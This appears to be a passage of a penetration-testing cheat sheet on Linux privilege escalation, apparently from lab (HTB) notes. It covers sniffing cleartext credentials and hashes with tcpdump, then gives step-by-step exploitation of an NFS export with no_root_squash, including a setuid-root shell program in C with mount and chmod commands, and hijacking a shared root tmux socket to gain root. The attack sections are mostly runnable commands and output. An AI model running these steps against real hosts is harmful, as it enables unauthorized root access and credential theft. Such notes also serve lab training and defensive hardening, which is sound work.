Miscellaneous

Passive Traffic Capture

If tcpdump is installed, unprivileged users may be able to capture network traffic, including, in some cases, credentials passed in cleartext. Several tools exist, such as net-creds and PCredz that can be used to examine data being passed on the wire. This may result in capturing sensitive information such as credit card numbers and SNMP community strings. It may also be possible to capture Net-NTLMv2, SMBv2, or Kerberos hashes, which could be subjected to an offline brute force attack to reveal the plaintext password. Cleartext protocols such as HTTP, FTP, POP, IMAP, telnet, or SMTP may contain credentials that could be reused to escalate privileges on the host.

Weak NFS Privileges

Sample Exploitation (Check hacktricks)

1. Check if no_root_squash

   $ cat /etc/exports
   
   # /etc/exports: the access control list for filesystems which may be exported
   #		to NFS clients.  See exports(5).
   #
   # Example for NFSv2 and NFSv3:
   # /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
   #
   # Example for NFSv4:
   # /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
   # /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
   #
   /var/nfs/general *(rw,no_root_squash)
   /tmp *(rw,no_root_squash)

2. Create a binary on attacker machine

   $ cat shell.c 
   
   #include <stdio.h>
   #include <sys/types.h>
   #include <unistd.h>
   int main(void)
   {
     setuid(0); setgid(0); system("/bin/bash");
   }
   
   $ gcc shell.c -o shell

3. Mount the directory on /tmp, copy the binary, and set necessary permissions.

   $ sudo mount -t nfs 10.129.2.12:/tmp /mnt
   $ cp shell /mnt
   $ chmod u+s /mnt/shell

4. Go to the low priv user and execute the binary

   $  ls -la
   
   total 68
   drwxrwxrwt 10 root  root   4096 Sep  1 06:15 .
   drwxr-xr-x 24 root  root   4096 Aug 31 02:24 ..
   -rwsr-xr-x  1 root  root  16712 Sep  1 06:15 shell
   
   $ ./shell

Hijacking TMUX Sessions

Sample Exploitation

1. Assuming that this command was run perviously

   $ tmux -S /shareds new -s debugsess
   $ chown root:devs /shareds

2. If we can pwn an account belongin to the devs group, we can attach to that session and gain root

3. Check for running tmux process

   $  ps aux | grep tmux
   
   root      4806  0.0  0.1  29416  3204 ?        Ss   06:27   0:00 tmux -S /shareds new -s debugsess

4. Confirm permissions

   $ ls -la /shareds 
   
   srw-rw---- 1 root devs 0 Sep  1 06:27 /shareds

5. Confirm we are in devs group

   $ id
   
   uid=1000(htb) gid=1000(htb) groups=1000(htb),1011(devs)

6. Attach to the tmux session

   $ tmux -S /shareds
   
   id
   
   uid=0(root) gid=0(root) groups=0(root)